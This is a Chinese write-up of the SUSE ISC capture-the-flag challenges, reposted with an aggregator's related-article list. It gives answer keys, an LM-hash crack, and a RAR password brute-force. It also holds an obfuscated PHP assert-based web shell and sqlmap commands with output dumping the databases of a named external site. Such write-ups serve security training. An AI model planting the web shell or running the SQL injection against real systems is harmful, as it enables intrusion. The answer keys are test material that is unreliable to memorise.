四川理工学院SUSE ISC writeup

IE下挑战页面错位 果然是学生 界面做的比较寒酸
地址:http://isc.suse.edu.cn/rule.aspx

四川理工学院SUSE ISC writeup

基础关

1.

四川理工学院SUSE ISC writeup

key:Yes,it is!

2.

四川理工学院SUSE ISC writeup

d3d3LnN1c2UuZWR1LmNu
Base64
key:www.suse.edu.cn

3.

四川理工学院SUSE ISC writeup

4.
key:jfasdsdlml.html

5.

四川理工学院SUSE ISC writeup

四川理工学院SUSE ISC writeup

key:n38f298hsjf

6.

四川理工学院SUSE ISC writeup

四川理工学院SUSE ISC writeup

hacker:1003:506EF63F9D2D3A05735D87D49CCAE09F:F31FED6430CB1E445A050F709EF0C340:::
F31FED6430CB1E445A050F709EF0C340
scgfds2010
http://www.md5decrypter.co.uk/sha1-decrypt.aspx
506ef63f9d2d3a05735d87d49ccae09f LM: SCGFDS2010

hacker
scgfds2010

四川理工学院SUSE ISC writeup

请去掉过关码里的特殊字符(:或[或]或{或}或?或.)然后提交。
按道理key应该是Key: NowYouKnowLMHASH
这题出题答案错误,原题key如上。(参见:http://www.cnblogs.com/carbonincauc/
他题目给的key:NowYouKnowLMHASH:) 这应该是错误的,不知道是怎么出题的。。。
7.

四川理工学院SUSE ISC writeup

跟之前西南大学那个打不开的图片类似

12 13 14 15 代表的是宽
16 17 18 19 是高
修改文件头里的宽为FF

key:bmpisgood

8.

四川理工学院SUSE ISC writeup

Rar密码爆破
Advanced RAR Password Recovery 加载字典41m 51s就跑出密码是public
这也告诉我们 机密文件rar加密一点要强密码 高级的pgp吧
key is:EvolutionU

9.

四川理工学院SUSE ISC writeup

http://www.gamani.com/gmgdown.htm
下载GIF Movie Gear 查看gif多帧

四川理工学院SUSE ISC writeup

luby’s photo
话说PS cs4一下都只能查看一帧(虽然也有动画功能) cs5以上就ok
Key:luby'sphoto

四川理工学院SUSE ISC writeup

10.

-..- .. .- --- ... .... .. .... --- ..- -.-- --- -. -- --- ... .... ..
摩斯电码 密码学
key:XIAOSHIHOUYONMOSHI
http://www.twinsenliang.net/skill/20070702.html
四川理工学院SUSE ISC writeup

11.

四川理工学院SUSE ISC writeup

四川理工学院SUSE ISC writeup

四川理工学院SUSE ISC writeup

key:ipAlsoCanFake

12.

WkROa00weHVUakZqTWxWMVdsZFNNVXh0VG5VPQ==
3次base64decode
key:www.suse.edu.cn
13.

WVVoU01HTkViM1pNTW5CeVpVTTFlbVJZVG14TWJWWnJaRk0xYW1KcE9EMD0=
3次base64decode
key:http://jkx.suse.edu.cn/

14.

四川理工学院SUSE ISC writeup

15.

四川理工学院SUSE ISC writeup

四川理工学院SUSE ISC writeup

Bruce Molay

注意大小写

脚本关

1.

四川理工学院SUSE ISC writeup

Disable js

The key is:aedft7aw6eftwe87
2.

四川理工学院SUSE ISC writeup

heLLoPHP!
3.

四川理工学院SUSE ISC writeup

四川理工学院SUSE ISC writeup

这个对'做了简单的js验证 直接firefox上禁用js就好了
NOWheLlojsWorld!

4.

四川理工学院SUSE ISC writeup

key is:GGGGGGGoolubyooodd

5.

四川理工学院SUSE ISC writeup

四川理工学院SUSE ISC writeup

<!--key is:MaxisNOthing-->

6.

四川理工学院SUSE ISC writeup

四川理工学院SUSE ISC writeup

jim 注意m后面有个空格
7.

<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; //sser
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; //assert
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); //@assert($_POST[-7]);
//assert — 检查一个断言是否为 FALSE.如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行
?>
变量名中的花括号的用途是提高优先级
http://www.jcodecraeer.com/a/phpjiaocheng/2013/0720/1448.html
各种提交@assert($_POST[-7]);都不对 最后发现key就是-7 2b的出题者
正确的key应该是:@assert($_POST[-7]);
他的key就是-7 我觉得出题人又在犯二了 哎。。。
8.

四川理工学院SUSE ISC writeup

[email protected]@feng
9.

四川理工学院SUSE ISC writeup

vB5_5cR1pT.Vb$
10.

C:\Python27\sqlmap>python sqlmap.py -u "http://tokyoh0t.tk/mix/showart.php?id=1"
--dbs
web server operating system: Linux CentOS
web application technology: Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[17:07:48] [INFO] fetching database names
[17:07:49] [INFO] the SQL query used returns 2 entries
[17:07:49] [INFO] retrieved: "information_schema"
[17:07:49] [INFO] retrieved: "dawnertk_inject"
available databases [2]:
[*] dawnertk_inject
[*] information_schema

Database: dawnertk_inject
[1 table]
+---------+
| article |
+---------+

C:\Python27\sqlmap>python sqlmap.py -u "http://tokyoh0t.tk/mix/showart.php?id=1"
--sql-query "select * from article" -D "dawnertk_inject"
K3y: heloba

11.

770c1eb1441cc8d48fa988ec21dbc916 直接提交可以获得key
解密一下是时间戳 所以刷新看到的不一样
1383295093
所以php就是md5(time())

KEY:md5(4Luy)
12.火星语+抓包

程序关

1.dreamok123abc999
就是循环 逐个去除字符 然后递归
正确输出的就是key 异常exception捕获一下就可以了
2.
0,1,2,3,4,5,6,7,8,9
*,*,*,*,*,*,*,*,*,*
6210001000

逆向关

1.HelloWorld!
2.EasyKey
3.17853

溢出关

1.shellcodeisgood
2.SUSE_CCST_Dream

渗透关

1. HelloDetect!!!
2.
3.LOVEadmin

综合训练关1

1.chk_pass!
2.comegamepoint222
3.*#!*
4.pdfisWidely!
5.URsoGreat

大杂烩训练

1.Key:FBI_snatchlist.doc
2.1992/12/24

from:http://yxmhero1989.blog.163.com/blog/static/112157956201310711234647

分类:默认分类 时间:2012-07-27 人气:1
本文关键词:
分享到:

相关文章

  • SUSE LINUX中的SSH安全加固小结 2012-04-08

    在用ssh登陆远程主机(suse linux系统)的时候,出现下列问题: ssh_exchange_identification: Connection closed by remote host,如图: 这个问题是因SSH的安全限制造成的。虽然很好解决,但是需要去机房现场(因安全规定没有开VNC)。具体解决办法:修改/etc/hosts.allow文件,加入sshd:ALL:ALLOW,然后wq保存并重启sshd服务即可。 就这个小问题,来总结一下SUSE LINUX中的SSH安全加固问题:

  • 媲美Windows?SUSE Linux 9.1多图揭秘 2012-10-31

    >   来自Madpenguin.org的消息称,SUSE将于2004年5月6日发布其SUSE Linux 9.1。SUSE Linux 9.1将分为两个版本:Personal版和Professional版。前者的价格将低至29.95美元,后者的价格为89.95美元。   据了解,SUSE Linux 9.1的主要特性包括:   ·Linux内核2.6.4;   ·XFree86 4.4;   ·KDE 3.2.1桌面环境;   ·OpenOffice.org 1.1.1办公生产力套件;

  • Suse系统磁盘文件损坏恢复 2012-11-09

      Suse系统磁盘文件损坏恢复   今天早上过来,发现开发机连不了,原因可能是周末物业断电导致的。开机,可是发现机器启不来的。 www.pcjsh.com   进入救援(failSafe)模式检测问题,发现是因为/dev/sda4分区出现文件系统损坏。   /dev/sda4: UNEXPECTED INCONSISTENCY: run fsck manually.(i.e. without -a or -p option)   OK,找到原因了就好办法了。   1. 在救援模式中输入root

  • 为SUSE Linux添加软件安装源 2013-02-23

    为SUSE Linux添加软件安装源 在使用Linux 的时候最郁闷的就是软件的安装 了,很多时候用源码安装需要很多的依赖包,十分麻烦。 添加软件安装源无疑是一个很好的解决方式 在SUSE Linux 上添加软件安装源方法如下: 在终端命令行下 Java代码 www.2cto.com #yast2 进入yast2 管理界面,点击软件安装源 下一步就是点击添加了 这里主要是说明一下源的路径是在哪里找到的 http://download.opensuse.org/distribution/11.4/

  • Hyper-V中安装Linux之一-SUSE安装 2013-04-21

    大家常常在Windows Server 2008的Hyper-V安装的都是Windows 系列的操作系统,其实在Hyper-V也能够安装Linux的系统。 目前官方支持的有以下的几个操作系统: l SUSE Linux Enterprise Server 10 with Service Pack 3 (x86 Edition or x64 Edition) l SUSE Linux Enterprise Server 11 (x86 Edition or x64 Edition) l Red H

  • ISC看点:云服务将成应对黑客主力武器 2013-05-08

    黑客攻击正变得越来越复杂:一方面DDoS攻击比以前更多,攻击手段更加多样化,另一方面,对应用程序的攻击造成的破坏比以往更大。9月23日下午,在由360主办的中国互联网安全大会(ISC)上,来自世界各地的网络安全专家,就DDoS攻击展开了热烈讨论,360公司的嘉宾唐会军在题为《云服务防DDoS攻击策略》的演讲中,详细解读了如何通过云服务策略快捷方便的防范DDoS攻击。 嘉宾唐会军现场演讲 据Check Point统计,2012年网络犯罪手法中,32%的攻击事件使用了DDoS攻击,65%的企业曾经受

  • SUSE Linux Enterprise Server 设置IP地址.网关.DNS的方法 2013-06-22

    说明: ip:192.168.21.172 子网掩码:255.255.255.0 网关:192.168.21.2 dns:8.8.8.8 8.8.4.4 1、设置ip地址 vi /etc/sysconfig/network/ifcfg-eth0 #编辑配置文件 BOOTPROTO='static' #静态IP BROADCAST='192.168.21.255' #广播地址 IPADDR='192.168.21.172' #IP地址 NETMASK='255.255.255.0' #子网掩码 N

  • SUSE Linux Enterprise Server 11 SP1 安装教程图文详解 2013-11-02

      一、说明:   操作系统:SUSE Linux Enterprise Server 11 SP1   下载地址: 二、安装系统    用启动盘成功引导之后,出现下面的界面   系统运维 温馨提醒:qihang01原创内容版权所有,转载请注明出处及原文链接   默认进入下面界面   安装界面说明:   1、Boot from Hard Disk #从硬盘启动   2、installation #安装   3、Repail installed System #修复已安装的系统   4、Rescu

  • suse安装配置mysql 2013-11-03

    suse安装配置mysql Sql代码 rpm -qa|grep mysql 查看是否安装过mysql 或者在yast里面查看是否安装过mysql 前面有i表示已经安装 yast-->software--->software Management-->Filters 选择RPM Groups--》Applications 如果安装则进行卸载,在yast里面或者rpm -e mysql命令卸载 Linux代码 rpm -ivh Mysql-server***.rpm 安装mysq

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.045 (s). 10 q(s)